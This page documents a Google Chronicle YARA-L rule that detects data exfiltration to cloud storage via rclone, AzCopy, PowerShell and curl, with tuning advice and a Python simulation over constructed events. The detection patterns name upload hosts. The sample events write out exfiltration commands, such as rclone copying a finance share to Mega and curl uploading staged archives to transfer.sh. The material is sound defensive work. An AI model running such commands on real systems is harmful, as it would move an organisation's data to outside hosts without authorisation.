THREAT-CloudStorage-DataExfil Google Chronicle · YARA-L

Detect Data Exfiltration via Cloud Storage Services in Google Chronicle

Exfiltration of corporate data to attacker-controlled cloud storage is a dominant technique in double-extortion ransomware campaigns and espionage operations. Adversaries upload to legitimate cloud storage services (Mega, Dropbox, OneDrive, Box, Google Drive, ShareFile) using legitimate transfer tools (rclone, AzCopy) so that exfiltration traffic blends with normal business activity and passes egress controls that only block unknown C2 IPs. Scattered Spider used Mega for SMB data exfiltration before ransomware deployment in 2024-2025. Akira and Black Basta affiliates use rclone with SFTP and cloud backends. Lazarus Group favors Dropbox and Google Drive.

Key indicators:
  • rclone.exe or azcopy.exe execution with external cloud endpoints
  • large outbound data transfers to cloud storage IPs
  • WinSCP or FileZilla used for bulk data staging
  • PowerShell Invoke-WebRequest with cloud storage URLs

Detection opportunities exist in the staging phase (file collection before transfer) and in the transfer phase (process and network telemetry). The rule below covers the transfer phase through process telemetry only.

MITRE ATT&CK

Tactic: Exfiltration
Technique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

YARA-L Detection Query

Google Chronicle (YARA-L)
rule cloud_storage_data_exfiltration {
  meta:
    author = "df00tech"
    description = "Detects data exfiltration via rclone, AzCopy, and cloud storage API abuse from scripting engines"
    severity = "HIGH"
    mitre_attack_tactic = "Exfiltration"
    mitre_attack_technique = "T1567.002"
    threat_actors = "Scattered Spider, Akira, Black Basta, Lazarus"
    reference = "https://attack.mitre.org/techniques/T1567/002/"

  events:
    $e.metadata.event_type = "PROCESS_LAUNCH"
    (
      // Branch 1: any rclone execution, no command-line filter
      re.regex($e.target.process.file.full_path, `(?i)rclone\.exe`)
      // Branch 2: AzCopy with an Azure Storage endpoint on the command line
      or (
        re.regex($e.target.process.file.full_path, `(?i)azcopy\.exe`)
        and re.regex($e.target.process.command_line, `(?i)(blob|file|queue)\.core\.windows\.net`)
      )
      // Branch 3: scripting engines or curl referencing cloud storage or anonymous upload hosts
      or (
        re.regex($e.target.process.file.full_path, `(?i)(powershell|pwsh|curl|wscript|cscript)\.exe`)
        and re.regex($e.target.process.command_line, `(?i)(mega\.nz|mega\.io|dropbox\.com|dropboxapi\.com|transfer\.sh|gofile\.io|box\.com|box\.net|drive\.google\.com|onedrive\.live\.com|sharefile\.com|sendspace\.com|filebin\.net|anonfiles\.com)`)
      )
    )
    // Placeholder for a per-host match window (see False Positives & Tuning)
    $hostname = $e.principal.hostname

  condition:
    $e
}
Severity: HIGH · Confidence: HIGH

Chronicle YARA-L 2.0 rule over PROCESS_LAUNCH UDM events. It fires on three branches: any rclone.exe execution (no command-line filter; where rclone is not a sanctioned tool, its presence alone is high-fidelity), AzCopy invocations whose command line references an Azure Storage endpoint (blob, file or queue under core.windows.net; corporate accounts are excluded through tuning, not by the rule itself), and PowerShell, pwsh, curl, wscript or cscript launches whose command line references a cloud storage or anonymous upload domain. Covers the documented TTPs for Scattered Spider (Mega), Akira and Black Basta (rclone), and Lazarus Group (Dropbox, Google Drive). The rule does not see WinSCP or FileZilla activity or the network transfer itself; pair it with NETWORK_CONNECTION or proxy telemetry for volume-based detection.

Data Sources

  • Google Chronicle SIEM
  • Chronicle UDM (Unified Data Model)
  • Chronicle Forwarder (Windows Events)
  • Google Cloud Endpoint Agent

Required Tables

UDM Events (PROCESS_LAUNCH)

False Positives & Tuning

  • Authorized cloud-to-cloud migrations: IT teams running rclone under approved service accounts for scheduled data migrations. Maintain a Chronicle reference list of the authorized principal.user.userid values and add not $e.principal.user.userid in %authorized_migration_accounts to the events block.
  • Azure infrastructure automation: operations or platform engineering teams running AzCopy for Blob Storage management tasks. Build a Chronicle regex reference list of corporate storage account FQDNs and add not $e.target.process.command_line in regex %corp_storage_accounts to suppress known-good targets. Keep the list to the corporate account names only: an attacker-controlled storage account also lives under core.windows.net, so excluding the suffix would blind the branch.
  • Sanctioned file-sharing clients and helper scripts: the native Google Drive, OneDrive, or Dropbox for Business sync clients do not match (the process filter is limited to scripting engines and curl), but scripted uploads that call their APIs under standard user accounts do. Rather than excluding these hosts outright, add a match section on the $hostname placeholder the rule already declares (for example $hostname over 1h) and a condition such as #e > 2, so the scripting branch alerts on volume per host rather than on a single invocation.
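To show what the events block above actually matches, and how the three tuning controls change the outcome, here is an added Python re-implementation of the rule's matching logic (not code from the original page or from df00tech), run over constructed PROCESS_LAUNCH events. Field paths mirror the UDM fields the rule uses; the sample events, the contents of the two reference lists, and the per-host threshold of 3 are assumptions for illustration.

```python
# Added example (not part of the original page or df00tech's rule): Python
# re-implementation of the rule's PROCESS_LAUNCH matching logic with the
# tuning controls from the False Positives section layered on top, run over
# constructed UDM-style events. Event dicts use flattened UDM field paths; the
# events, reference-list contents and threshold are assumptions.
import re
from collections import defaultdict

# Regexes transcribed from the rule's events block (RE2 "(?i)" becomes re.I).
RCLONE = re.compile(r"rclone\.exe", re.I)
AZCOPY = re.compile(r"azcopy\.exe", re.I)
AZ_ENDPOINT = re.compile(r"(blob|file|queue)\.core\.windows\.net", re.I)
SCRIPTER = re.compile(r"(powershell|pwsh|curl|wscript|cscript)\.exe", re.I)
CLOUD_HOSTS = re.compile(
    r"(mega\.nz|mega\.io|dropbox\.com|dropboxapi\.com|transfer\.sh|gofile\.io|"
    r"box\.com|box\.net|drive\.google\.com|onedrive\.live\.com|sharefile\.com|"
    r"sendspace\.com|filebin\.net|anonfiles\.com)", re.I)

# Stand-ins for the Chronicle reference lists named in the tuning notes
# (assumed contents); %corp_storage_accounts is a regex list in Chronicle.
AUTHORIZED_MIGRATION_ACCOUNTS = {"svc-migration"}
CORP_STORAGE_ACCOUNTS = [re.compile(r"corpdata01\.blob\.core\.windows\.net", re.I)]
# Scripting-engine hits per host inside one window before alerting (assumed);
# the rclone and AzCopy branches still alert on a single event.
HOST_THRESHOLD = 3


def base_match(ev):
    """Mirror of the rule's events block. Returns the matching branch or None."""
    if ev["metadata.event_type"] != "PROCESS_LAUNCH":
        return None
    path = ev["target.process.file.full_path"]
    cmd = ev.get("target.process.command_line", "")
    if RCLONE.search(path):                                 # branch 1
        return "rclone"
    if AZCOPY.search(path) and AZ_ENDPOINT.search(cmd):     # branch 2
        return "azcopy"
    if SCRIPTER.search(path) and CLOUD_HOSTS.search(cmd):   # branch 3
        return "script"
    return None


def tuned_match(ev):
    """base_match plus the reference-list exclusions from the tuning notes."""
    branch = base_match(ev)
    cmd = ev.get("target.process.command_line", "")
    if branch == "rclone" and ev.get("principal.user.userid") in AUTHORIZED_MIGRATION_ACCOUNTS:
        return None
    if branch == "azcopy" and any(r.search(cmd) for r in CORP_STORAGE_ACCOUNTS):
        return None
    return branch


def evaluate(events, threshold=HOST_THRESHOLD):
    """Per-host evaluation, the equivalent of `match: $hostname over 1h` with a
    count condition on the scripting branch. All events passed in are assumed
    to fall inside one window. Returns {hostname: sorted branch names}."""
    per_host = defaultdict(list)
    for ev in events:
        branch = tuned_match(ev)
        if branch:
            per_host[ev["principal.hostname"]].append(branch)
    alerts = {}
    for host, branches in per_host.items():
        fired = sorted(b for b in set(branches) if b != "script")
        if branches.count("script") >= threshold:
            fired.append("script")
        if fired:
            alerts[host] = fired
    return alerts


def launch(host, user, path, cmd, event_type="PROCESS_LAUNCH"):
    """Build a minimal UDM-style event with flattened field paths."""
    return {"metadata.event_type": event_type, "principal.hostname": host,
            "principal.user.userid": user, "target.process.file.full_path": path,
            "target.process.command_line": cmd}


# Constructed sample telemetry, not real logs.
SAMPLE_EVENTS = [
    # ad-hoc rclone from a user profile: fires (branch 1)
    launch("WS01", "jdoe", r"C:\Users\jdoe\AppData\Local\Temp\rclone.exe",
           r"rclone.exe copy C:\Shares\Finance mega:staging -q"),
    # same binary under the approved migration account: suppressed
    launch("SRV-MIG01", "svc-migration", r"C:\Tools\rclone\rclone.exe",
           r"rclone.exe sync D:\Archive gcs:corp-archive"),
    # AzCopy to a corporate storage account: suppressed by the regex list
    launch("BUILD01", "devops", r"C:\Program Files\AzCopy\azcopy.exe",
           r'azcopy copy "C:\out" "https://corpdata01.blob.core.windows.net/releases"'),
    # AzCopy to an unknown storage account: fires (branch 2)
    launch("WS02", "asmith", r"C:\Users\asmith\Downloads\azcopy.exe",
           r'azcopy copy "C:\HR" "https://stg7k2q.blob.core.windows.net/x" --recursive'),
    # one PowerShell upload on WS03: matches branch 3 but stays below threshold
    launch("WS03", "bwong", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
           r"powershell -c Invoke-WebRequest -Uri https://content.dropboxapi.com/2/files/upload -InFile C:\stage\hr.zip"),
    # cloud URL in a non-scripting process: the process filter does not match
    launch("WS05", "kpatel", r"C:\Windows\System32\notepad.exe",
           "notepad.exe https://drive.google.com/drive/my-drive"),
    # right binary, wrong event type: the rule only inspects PROCESS_LAUNCH
    launch("WS06", "jdoe", r"C:\Temp\rclone.exe", "rclone.exe lsd mega:", "NETWORK_CONNECTION"),
] + [
    # three curl.exe uploads from WS04 inside one window: crosses the threshold
    launch("WS04", "cruiz", r"C:\Windows\System32\curl.exe",
           rf"curl.exe --upload-file C:\stage\part{i}.7z https://transfer.sh/part{i}.7z")
    for i in range(3)
]

if __name__ == "__main__":
    for host, branches in evaluate(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {', '.join(branches)}")
```

Running it prints alerts for WS01 (rclone), WS02 (AzCopy to an unrecognised storage account) and WS04 (three curl uploads in one window); SRV-MIG01 and BUILD01 are suppressed by the list exclusions, WS03 stays below the threshold, and WS05 and WS06 never satisfy the events block. In Chronicle the same per-host counting is a match section on the $hostname placeholder the rule already declares, with a condition such as #e > 2.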

Testing Methodology

Validate this detection against the Atomic Red Team test for T1567.002. The test below lists the behaviour to exercise and the telemetry you should expect to see.

  1. Test 1: Simulate Cloud Exfiltration via rclone to Mega

    Expected signal: Sysmon Event ID 1 (UDM PROCESS_LAUNCH): rclone.exe with a copy command targeting the mega remote; this is the event the rule matches, and it should fire on the single launch. Sysmon Event ID 3 (UDM NETWORK_CONNECTION): network connection to mega.co.nz or api.mega.co.nz; corroborating telemetry for the investigation, not matched by this rule.
